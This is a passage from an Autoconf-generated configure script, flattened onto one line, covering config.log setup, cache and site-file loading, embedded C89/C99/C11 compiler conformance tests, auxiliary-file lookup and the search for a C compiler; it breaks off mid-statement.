ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; } then : ac_retval=0 else case e in #( e) printf "%s\n" "$as_me: program exited with status $ac_status" >&5 printf "%s\n" "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=$ac_status ;; esac fi rm -rf conftest.dSYM conftest_ipa8_conftest.oo eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_c_try_run ac_configure_args_raw= for ac_arg do case $ac_arg in *\'*) ac_arg=`printf "%s\n" "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;; esac as_fn_append ac_configure_args_raw " '$ac_arg'" done case $ac_configure_args_raw in *$as_nl*) ac_safe_unquote= ;; *) ac_unsafe_z='|&;<>()$`\\"*?[ '' ' # This string ends in space, tab. ac_unsafe_a="$ac_unsafe_z#~" ac_safe_unquote="s/ '\\([^$ac_unsafe_a][^$ac_unsafe_z]*\\)'/ \\1/g" ac_configure_args_raw=` printf "%s\n" "$ac_configure_args_raw" | sed "$ac_safe_unquote"`;; esac cat >config.log <<_ACEOF This file contains any messages produced by compilers while running configure, to aid debugging if configure makes a mistake. It was created by $as_me, which was generated by GNU Autoconf 2.72. Invocation command line was $ $0$ac_configure_args_raw _ACEOF exec 5>>config.log { cat <<_ASUNAME ## --------- ## ## Platform. ## ## --------- ## hostname = `(hostname || uname -n) 2>/dev/null | sed 1q` uname -m = `(uname -m) 2>/dev/null || echo unknown` uname -r = `(uname -r) 2>/dev/null || echo unknown` uname -s = `(uname -s) 2>/dev/null || echo unknown` uname -v = `(uname -v) 2>/dev/null || echo unknown` /usr/bin/uname -p = `(/usr/bin/uname -p) 2>/dev/null || echo unknown` /bin/uname -X = `(/bin/uname -X) 2>/dev/null || echo unknown` /bin/arch = `(/bin/arch) 2>/dev/null || echo unknown` /usr/bin/arch -k = `(/usr/bin/arch -k) 2>/dev/null || echo unknown` /usr/convex/getsysinfo = `(/usr/convex/getsysinfo) 2>/dev/null || echo unknown` /usr/bin/hostinfo = `(/usr/bin/hostinfo) 2>/dev/null || echo unknown` /bin/machine = `(/bin/machine) 2>/dev/null || echo unknown` /usr/bin/oslevel = `(/usr/bin/oslevel) 2>/dev/null || echo unknown` /bin/universe = `(/bin/universe) 2>/dev/null || echo unknown` _ASUNAME as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac printf "%s\n" "PATH: $as_dir" done IFS=$as_save_IFS } >&5 cat >&5 <<_ACEOF ## ----------- ## ## Core tests. ## ## ----------- ## _ACEOF # Keep a trace of the command line. # Strip out --no-create and --no-recursion so they do not pile up. # Strip out --silent because we don't want to record it for future runs. # Also quote any args containing shell meta-characters. # Make two passes to allow for proper duplicate-argument suppression. ac_configure_args= ac_configure_args0= ac_configure_args1= ac_must_keep_next=false for ac_pass in 1 2 do for ac_arg do case $ac_arg in -no-create | --no-c* | -n | -no-recursion | --no-r*) continue ;; -q | -quiet | --quiet | --quie | --qui | --qu | --q \ | -silent | --silent | --silen | --sile | --sil) continue ;; *\'*) ac_arg=`printf "%s\n" "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;; esac case $ac_pass in 1) as_fn_append ac_configure_args0 " '$ac_arg'" ;; 2) as_fn_append ac_configure_args1 " '$ac_arg'" if test $ac_must_keep_next = true; then ac_must_keep_next=false # Got value, back to normal. else case $ac_arg in *=* | --config-cache | -C | -disable-* | --disable-* \ | -enable-* | --enable-* | -gas | --g* | -nfp | --nf* \ | -q | -quiet | --q* | -silent | --sil* | -v | -verb* \ | -with-* | --with-* | -without-* | --without-* | --x) case "$ac_configure_args0 " in "$ac_configure_args1"*" '$ac_arg' "* ) continue ;; esac ;; -* ) ac_must_keep_next=true ;; esac fi as_fn_append ac_configure_args " '$ac_arg'" ;; esac done done { ac_configure_args0=; unset ac_configure_args0;} { ac_configure_args1=; unset ac_configure_args1;} # When interrupted or exit'd, cleanup temporary files, and complete # config.log. We remove comments because anyway the quotes in there # would cause problems or look ugly. # WARNING: Use '\'' to represent an apostrophe within the trap. # WARNING: Do not start the trap code with a newline, due to a FreeBSD 4.0 bug. trap 'exit_status=$? # Sanitize IFS. IFS=" "" $as_nl" # Save into config.log some information that might help in debugging. { echo printf "%s\n" "## ---------------- ## ## Cache variables. ## ## ---------------- ##" echo # The following way of writing the cache mishandles newlines in values, ( for ac_var in `(set) 2>&1 | sed -n '\''s/^\([a-zA-Z_][a-zA-Z0-9_]*\)=.*/\1/p'\''`; do eval ac_val=\$$ac_var case $ac_val in #( *${as_nl}*) case $ac_var in #( *_cv_*) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 printf "%s\n" "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; esac case $ac_var in #( _ | IFS | as_nl) ;; #( BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( *) { eval $ac_var=; unset $ac_var;} ;; esac ;; esac done (set) 2>&1 | case $as_nl`(ac_space='\'' '\''; set) 2>&1` in #( *${as_nl}ac_space=\ *) sed -n \ "s/'\''/'\''\\\\'\'''\''/g; s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\''\\2'\''/p" ;; #( *) sed -n "/^[_$as_cr_alnum]*_cv_[_$as_cr_alnum]*=/p" ;; esac | sort ) echo printf "%s\n" "## ----------------- ## ## Output variables. ## ## ----------------- ##" echo for ac_var in $ac_subst_vars do eval ac_val=\$$ac_var case $ac_val in *\'\''*) ac_val=`printf "%s\n" "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; esac printf "%s\n" "$ac_var='\''$ac_val'\''" done | sort echo if test -n "$ac_subst_files"; then printf "%s\n" "## ------------------- ## ## File substitutions. ## ## ------------------- ##" echo for ac_var in $ac_subst_files do eval ac_val=\$$ac_var case $ac_val in *\'\''*) ac_val=`printf "%s\n" "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; esac printf "%s\n" "$ac_var='\''$ac_val'\''" done | sort echo fi if test -s confdefs.h; then printf "%s\n" "## ----------- ## ## confdefs.h. ## ## ----------- ##" echo cat confdefs.h echo fi test "$ac_signal" != 0 && printf "%s\n" "$as_me: caught signal $ac_signal" printf "%s\n" "$as_me: exit $exit_status" } >&5 rm -f core *.core core.conftest.* && rm -f -r conftest* confdefs* conf$$* $ac_clean_files && exit $exit_status ' 0 for ac_signal in 1 2 13 15; do trap 'ac_signal='$ac_signal'; as_fn_exit 1' $ac_signal done ac_signal=0 # confdefs.h avoids OS command line length limits that DEFS can exceed. rm -f -r conftest* confdefs.h printf "%s\n" "/* confdefs.h */" > confdefs.h # Predefined preprocessor variables. printf "%s\n" "#define PACKAGE_NAME \"$PACKAGE_NAME\"" >>confdefs.h printf "%s\n" "#define PACKAGE_TARNAME \"$PACKAGE_TARNAME\"" >>confdefs.h printf "%s\n" "#define PACKAGE_VERSION \"$PACKAGE_VERSION\"" >>confdefs.h printf "%s\n" "#define PACKAGE_STRING \"$PACKAGE_STRING\"" >>confdefs.h printf "%s\n" "#define PACKAGE_BUGREPORT \"$PACKAGE_BUGREPORT\"" >>confdefs.h printf "%s\n" "#define PACKAGE_URL \"$PACKAGE_URL\"" >>confdefs.h # Let the site file select an alternate cache file if it wants to. # Prefer an explicitly selected file to automatically selected ones. if test -n "$CONFIG_SITE"; then ac_site_files="$CONFIG_SITE" elif test "x$prefix" != xNONE; then ac_site_files="$prefix/share/config.site $prefix/etc/config.site" else ac_site_files="$ac_default_prefix/share/config.site $ac_default_prefix/etc/config.site" fi for ac_site_file in $ac_site_files do case $ac_site_file in #( */*) : ;; #( *) : ac_site_file=./$ac_site_file ;; esac if test -f "$ac_site_file" && test -r "$ac_site_file"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: loading site script $ac_site_file" >&5 printf "%s\n" "$as_me: loading site script $ac_site_file" >&6;} sed 's/^/| /' "$ac_site_file" >&5 . "$ac_site_file" \ || { { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: in '$ac_pwd':" >&5 printf "%s\n" "$as_me: error: in '$ac_pwd':" >&2;} as_fn_error $? "failed to load site script $ac_site_file See 'config.log' for more details" "$LINENO" 5; } fi done if test -r "$cache_file"; then # Some versions of bash will fail to source /dev/null (special files # actually), so we avoid doing that. DJGPP emulates it as a regular file. if test /dev/null != "$cache_file" && test -f "$cache_file"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: loading cache $cache_file" >&5 printf "%s\n" "$as_me: loading cache $cache_file" >&6;} case $cache_file in [\\/]* | ?:[\\/]* ) . "$cache_file";; *) . "./$cache_file";; esac fi else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: creating cache $cache_file" >&5 printf "%s\n" "$as_me: creating cache $cache_file" >&6;} >$cache_file fi # Test code for whether the C compiler supports C89 (global declarations) ac_c_conftest_c89_globals=' /* Does the compiler advertise C89 conformance? Do not test the value of __STDC__, because some compilers set it to 0 while being otherwise adequately conformant. */ #if !defined __STDC__ # error "Compiler does not advertise C89 conformance" #endif #include #include struct stat; /* Most of the following tests are stolen from RCS 5.7 src/conf.sh. */ struct buf { int x; }; struct buf * (*rcsopen) (struct buf *, struct stat *, int); static char *e (char **p, int i) { return p[i]; } static char *f (char * (*g) (char **, int), char **p, ...) { char *s; va_list v; va_start (v,p); s = g (p, va_arg (v,int)); va_end (v); return s; } /* C89 style stringification. */ #define noexpand_stringify(a) #a const char *stringified = noexpand_stringify(arbitrary+token=sequence); /* C89 style token pasting. Exercises some of the corner cases that e.g. old MSVC gets wrong, but not very hard. */ #define noexpand_concat(a,b) a##b #define expand_concat(a,b) noexpand_concat(a,b) extern int vA; extern int vbee; #define aye A #define bee B int *pvA = &expand_concat(v,aye); int *pvbee = &noexpand_concat(v,bee); /* OSF 4.0 Compaq cc is some sort of almost-ANSI by default. It has function prototypes and stuff, but not \xHH hex character constants. These do not provoke an error unfortunately, instead are silently treated as an "x". The following induces an error, until -std is added to get proper ANSI mode. Curiously \x00 != x always comes out true, for an array size at least. It is necessary to write \x00 == 0 to get something that is true only with -std. */ int osf4_cc_array ['\''\x00'\'' == 0 ? 1 : -1]; /* IBM C 6 for AIX is almost-ANSI by default, but it replaces macro parameters inside strings and character constants. */ #define FOO(x) '\''x'\'' int xlc6_cc_array[FOO(a) == '\''x'\'' ? 1 : -1]; int test (int i, double x); struct s1 {int (*f) (int a);}; struct s2 {int (*f) (double a);}; int pairnames (int, char **, int *(*)(struct buf *, struct stat *, int), int, int);' # Test code for whether the C compiler supports C89 (body of main). ac_c_conftest_c89_main=' ok |= (argc == 0 || f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1]); ' # Test code for whether the C compiler supports C99 (global declarations) ac_c_conftest_c99_globals=' /* Does the compiler advertise C99 conformance? */ #if !defined __STDC_VERSION__ || __STDC_VERSION__ < 199901L # error "Compiler does not advertise C99 conformance" #endif // See if C++-style comments work. #include extern int puts (const char *); extern int printf (const char *, ...); extern int dprintf (int, const char *, ...); extern void *malloc (size_t); extern void free (void *); // Check varargs macros. These examples are taken from C99 6.10.3.5. // dprintf is used instead of fprintf to avoid needing to declare // FILE and stderr. #define debug(...) dprintf (2, __VA_ARGS__) #define showlist(...) puts (#__VA_ARGS__) #define report(test,...) ((test) ? puts (#test) : printf (__VA_ARGS__)) static void test_varargs_macros (void) { int x = 1234; int y = 5678; debug ("Flag"); debug ("X = %d\n", x); showlist (The first, second, and third items.); report (x>y, "x is %d but y is %d", x, y); } // Check long long types. #define BIG64 18446744073709551615ull #define BIG32 4294967295ul #define BIG_OK (BIG64 / BIG32 == 4294967297ull && BIG64 % BIG32 == 0) #if !BIG_OK #error "your preprocessor is broken" #endif #if BIG_OK #else #error "your preprocessor is broken" #endif static long long int bignum = -9223372036854775807LL; static unsigned long long int ubignum = BIG64; struct incomplete_array { int datasize; double data[]; }; struct named_init { int number; const wchar_t *name; double average; }; typedef const char *ccp; static inline int test_restrict (ccp restrict text) { // Iterate through items via the restricted pointer. // Also check for declarations in for loops. for (unsigned int i = 0; *(text+i) != '\''\0'\''; ++i) continue; return 0; } // Check varargs and va_copy. static bool test_varargs (const char *format, ...) { va_list args; va_start (args, format); va_list args_copy; va_copy (args_copy, args); const char *str = ""; int number = 0; float fnumber = 0; while (*format) { switch (*format++) { case '\''s'\'': // string str = va_arg (args_copy, const char *); break; case '\''d'\'': // int number = va_arg (args_copy, int); break; case '\''f'\'': // float fnumber = va_arg (args_copy, double); break; default: break; } } va_end (args_copy); va_end (args); return *str && number && fnumber; } ' # Test code for whether the C compiler supports C99 (body of main). ac_c_conftest_c99_main=' // Check bool. _Bool success = false; success |= (argc != 0); // Check restrict. if (test_restrict ("String literal") == 0) success = true; char *restrict newvar = "Another string"; // Check varargs. success &= test_varargs ("s, d'\'' f .", "string", 65, 34.234); test_varargs_macros (); // Check flexible array members. struct incomplete_array *ia = malloc (sizeof (struct incomplete_array) + (sizeof (double) * 10)); ia->datasize = 10; for (int i = 0; i < ia->datasize; ++i) ia->data[i] = i * 1.234; // Work around memory leak warnings. free (ia); // Check named initializers. struct named_init ni = { .number = 34, .name = L"Test wide string", .average = 543.34343, }; ni.number = 58; int dynamic_array[ni.number]; dynamic_array[0] = argv[0][0]; dynamic_array[ni.number - 1] = 543; // work around unused variable warnings ok |= (!success || bignum == 0LL || ubignum == 0uLL || newvar[0] == '\''x'\'' || dynamic_array[ni.number - 1] != 543); ' # Test code for whether the C compiler supports C11 (global declarations) ac_c_conftest_c11_globals=' /* Does the compiler advertise C11 conformance? */ #if !defined __STDC_VERSION__ || __STDC_VERSION__ < 201112L # error "Compiler does not advertise C11 conformance" #endif // Check _Alignas. char _Alignas (double) aligned_as_double; char _Alignas (0) no_special_alignment; extern char aligned_as_int; char _Alignas (0) _Alignas (int) aligned_as_int; // Check _Alignof. enum { int_alignment = _Alignof (int), int_array_alignment = _Alignof (int[100]), char_alignment = _Alignof (char) }; _Static_assert (0 < -_Alignof (int), "_Alignof is signed"); // Check _Noreturn. int _Noreturn does_not_return (void) { for (;;) continue; } // Check _Static_assert. struct test_static_assert { int x; _Static_assert (sizeof (int) <= sizeof (long int), "_Static_assert does not work in struct"); long int y; }; // Check UTF-8 literals. #define u8 syntax error! char const utf8_literal[] = u8"happens to be ASCII" "another string"; // Check duplicate typedefs. typedef long *long_ptr; typedef long int *long_ptr; typedef long_ptr long_ptr; // Anonymous structures and unions -- taken from C11 6.7.2.1 Example 1. struct anonymous { union { struct { int i; int j; }; struct { int k; long int l; } w; }; int m; } v1; ' # Test code for whether the C compiler supports C11 (body of main). ac_c_conftest_c11_main=' _Static_assert ((offsetof (struct anonymous, i) == offsetof (struct anonymous, w.k)), "Anonymous union alignment botch"); v1.i = 2; v1.w.k = 5; ok |= v1.i != 5; ' # Test code for whether the C compiler supports C11 (complete). ac_c_conftest_c11_program="${ac_c_conftest_c89_globals} ${ac_c_conftest_c99_globals} ${ac_c_conftest_c11_globals} int main (int argc, char **argv) { int ok = 0; ${ac_c_conftest_c89_main} ${ac_c_conftest_c99_main} ${ac_c_conftest_c11_main} return ok; } " # Test code for whether the C compiler supports C99 (complete). ac_c_conftest_c99_program="${ac_c_conftest_c89_globals} ${ac_c_conftest_c99_globals} int main (int argc, char **argv) { int ok = 0; ${ac_c_conftest_c89_main} ${ac_c_conftest_c99_main} return ok; } " # Test code for whether the C compiler supports C89 (complete). ac_c_conftest_c89_program="${ac_c_conftest_c89_globals} int main (int argc, char **argv) { int ok = 0; ${ac_c_conftest_c89_main} return ok; } " as_fn_append ac_header_c_list " stdio.h stdio_h HAVE_STDIO_H" as_fn_append ac_header_c_list " stdlib.h stdlib_h HAVE_STDLIB_H" as_fn_append ac_header_c_list " string.h string_h HAVE_STRING_H" as_fn_append ac_header_c_list " inttypes.h inttypes_h HAVE_INTTYPES_H" as_fn_append ac_header_c_list " stdint.h stdint_h HAVE_STDINT_H" as_fn_append ac_header_c_list " strings.h strings_h HAVE_STRINGS_H" as_fn_append ac_header_c_list " sys/stat.h sys_stat_h HAVE_SYS_STAT_H" as_fn_append ac_header_c_list " sys/types.h sys_types_h HAVE_SYS_TYPES_H" as_fn_append ac_header_c_list " unistd.h unistd_h HAVE_UNISTD_H" # Auxiliary files required by this configure script. ac_aux_files="install-sh" # Locations in which to look for auxiliary files. ac_aux_dir_candidates="${srcdir}${PATH_SEPARATOR}${srcdir}/..${PATH_SEPARATOR}${srcdir}/../.." # Search for a directory containing all of the required auxiliary files, # $ac_aux_files, from the $PATH-style list $ac_aux_dir_candidates. # If we don't find one directory that contains all the files we need, # we report the set of missing files from the *first* directory in # $ac_aux_dir_candidates and give up. ac_missing_aux_files="" ac_first_candidate=: printf "%s\n" "$as_me:${as_lineno-$LINENO}: looking for aux files: $ac_aux_files" >&5 as_save_IFS=$IFS; IFS=$PATH_SEPARATOR as_found=false for as_dir in $ac_aux_dir_candidates do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac as_found=: printf "%s\n" "$as_me:${as_lineno-$LINENO}: trying $as_dir" >&5 ac_aux_dir_found=yes ac_install_sh= for ac_aux in $ac_aux_files do # As a special case, if "install-sh" is required, that requirement # can be satisfied by any of "install-sh", "install.sh", or "shtool", # and $ac_install_sh is set appropriately for whichever one is found. if test x"$ac_aux" = x"install-sh" then if test -f "${as_dir}install-sh"; then printf "%s\n" "$as_me:${as_lineno-$LINENO}: ${as_dir}install-sh found" >&5 ac_install_sh="${as_dir}install-sh -c" elif test -f "${as_dir}install.sh"; then printf "%s\n" "$as_me:${as_lineno-$LINENO}: ${as_dir}install.sh found" >&5 ac_install_sh="${as_dir}install.sh -c" elif test -f "${as_dir}shtool"; then printf "%s\n" "$as_me:${as_lineno-$LINENO}: ${as_dir}shtool found" >&5 ac_install_sh="${as_dir}shtool install -c" else ac_aux_dir_found=no if $ac_first_candidate; then ac_missing_aux_files="${ac_missing_aux_files} install-sh" else break fi fi else if test -f "${as_dir}${ac_aux}"; then printf "%s\n" "$as_me:${as_lineno-$LINENO}: ${as_dir}${ac_aux} found" >&5 else ac_aux_dir_found=no if $ac_first_candidate; then ac_missing_aux_files="${ac_missing_aux_files} ${ac_aux}" else break fi fi fi done if test "$ac_aux_dir_found" = yes; then ac_aux_dir="$as_dir" break fi ac_first_candidate=false as_found=false done IFS=$as_save_IFS if $as_found then : else case e in #( e) as_fn_error $? "cannot find required auxiliary files:$ac_missing_aux_files" "$LINENO" 5 ;; esac fi # These three variables are undocumented and unsupported, # and are intended to be withdrawn in a future Autoconf release. # They can cause serious problems if a builder's source tree is in a directory # whose full name contains unusual characters. if test -f "${ac_aux_dir}config.guess"; then ac_config_guess="$SHELL ${ac_aux_dir}config.guess" fi if test -f "${ac_aux_dir}config.sub"; then ac_config_sub="$SHELL ${ac_aux_dir}config.sub" fi if test -f "$ac_aux_dir/configure"; then ac_configure="$SHELL ${ac_aux_dir}configure" fi # Check that the precious variables saved in the cache have kept the same # value. ac_cache_corrupted=false for ac_var in $ac_precious_vars; do eval ac_old_set=\$ac_cv_env_${ac_var}_set eval ac_new_set=\$ac_env_${ac_var}_set eval ac_old_val=\$ac_cv_env_${ac_var}_value eval ac_new_val=\$ac_env_${ac_var}_value case $ac_old_set,$ac_new_set in set,) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: '$ac_var' was set to '$ac_old_val' in the previous run" >&5 printf "%s\n" "$as_me: error: '$ac_var' was set to '$ac_old_val' in the previous run" >&2;} ac_cache_corrupted=: ;; ,set) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: '$ac_var' was not set in the previous run" >&5 printf "%s\n" "$as_me: error: '$ac_var' was not set in the previous run" >&2;} ac_cache_corrupted=: ;; ,);; *) if test "x$ac_old_val" != "x$ac_new_val"; then # differences in whitespace do not lead to failure. ac_old_val_w=`echo x $ac_old_val` ac_new_val_w=`echo x $ac_new_val` if test "$ac_old_val_w" != "$ac_new_val_w"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: '$ac_var' has changed since the previous run:" >&5 printf "%s\n" "$as_me: error: '$ac_var' has changed since the previous run:" >&2;} ac_cache_corrupted=: else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: warning: ignoring whitespace changes in '$ac_var' since the previous run:" >&5 printf "%s\n" "$as_me: warning: ignoring whitespace changes in '$ac_var' since the previous run:" >&2;} eval $ac_var=\$ac_old_val fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: former value: '$ac_old_val'" >&5 printf "%s\n" "$as_me: former value: '$ac_old_val'" >&2;} { printf "%s\n" "$as_me:${as_lineno-$LINENO}: current value: '$ac_new_val'" >&5 printf "%s\n" "$as_me: current value: '$ac_new_val'" >&2;} fi;; esac # Pass precious variables to config.status. if test "$ac_new_set" = set; then case $ac_new_val in *\'*) ac_arg=$ac_var=`printf "%s\n" "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;; *) ac_arg=$ac_var=$ac_new_val ;; esac case " $ac_configure_args " in *" '$ac_arg' "*) ;; # Avoid dups. Use of quotes ensures accuracy. *) as_fn_append ac_configure_args " '$ac_arg'" ;; esac fi done if $ac_cache_corrupted; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: in '$ac_pwd':" >&5 printf "%s\n" "$as_me: error: in '$ac_pwd':" >&2;} { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: changes in the environment can compromise the build" >&5 printf "%s\n" "$as_me: error: changes in the environment can compromise the build" >&2;} as_fn_error $? "run '${MAKE-make} distclean' and/or 'rm $cache_file' and start over" "$LINENO" 5 fi ## -------------------- ## ## Main body of script. ## ## -------------------- ## ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu ac_config_headers="$ac_config_headers config.h" if test "$prefix" = "NONE"; then prefix="/usr/local" fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}gcc", so it can be a program name with args. set dummy ${ac_tool_prefix}gcc; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_CC+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_CC="${ac_tool_prefix}gcc" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi CC=$ac_cv_prog_CC if test -n "$CC"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 printf "%s\n" "$CC" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi fi if test -z "$ac_cv_prog_CC"; then ac_ct_CC=$CC # Extract the first word of "gcc", so it can be a program name with args. set dummy gcc; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_ac_ct_CC+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$ac_ct_CC"; then ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_CC="gcc" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi ac_ct_CC=$ac_cv_prog_ac_ct_CC if test -n "$ac_ct_CC"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 printf "%s\n" "$ac_ct_CC" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi if test "x$ac_ct_CC" = x; then CC="" else case $cross_compiling:$ac_tool_warned in yes:) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 printf "%s\n" "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac CC=$ac_ct_CC fi else CC="$ac_cv_prog_CC" fi if test -z "$CC"; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}cc", so it can be a program name with args. set dummy ${ac_tool_prefix}cc; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_CC+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_CC="${ac_tool_prefix}cc" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi CC=$ac_cv_prog_CC if test -n "$CC"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 printf "%s\n" "$CC" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi fi fi if test -z "$CC"; then # Extract the first word of "cc", so it can be a program name with args. set dummy cc; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_CC+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else ac_prog_rejected=no as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then if test "$as_dir$ac_word$ac_exec_ext" = "/usr/ucb/cc"; then ac_prog_rejected=yes continue fi ac_cv_prog_CC="cc" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS if test $ac_prog_rejected = yes; then # We found a bogon in the path, so make sure we never use it. set dummy $ac_cv_prog_CC shift if test $# != 0; then # We chose a different compiler from the bogus one. # However, it has the same basename, so the bogon will be chosen # first if we set CC to just the basename; use the full file name. shift ac_cv_prog_CC="$as_dir$ac_word${1+' '}$@" fi fi fi ;; esac fi CC=$ac_cv_prog_CC if test -n "$CC"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 printf "%s\n" "$CC" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi fi if test -z "$CC"; then if test -n "$ac_tool_prefix"; then for ac_prog in cl.exe do # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. set dummy $ac_tool_prefix$ac_prog; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_CC+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_CC="$ac_tool_prefix$ac_prog" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi CC=$ac_cv_prog_CC if test -n "$CC"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 printf 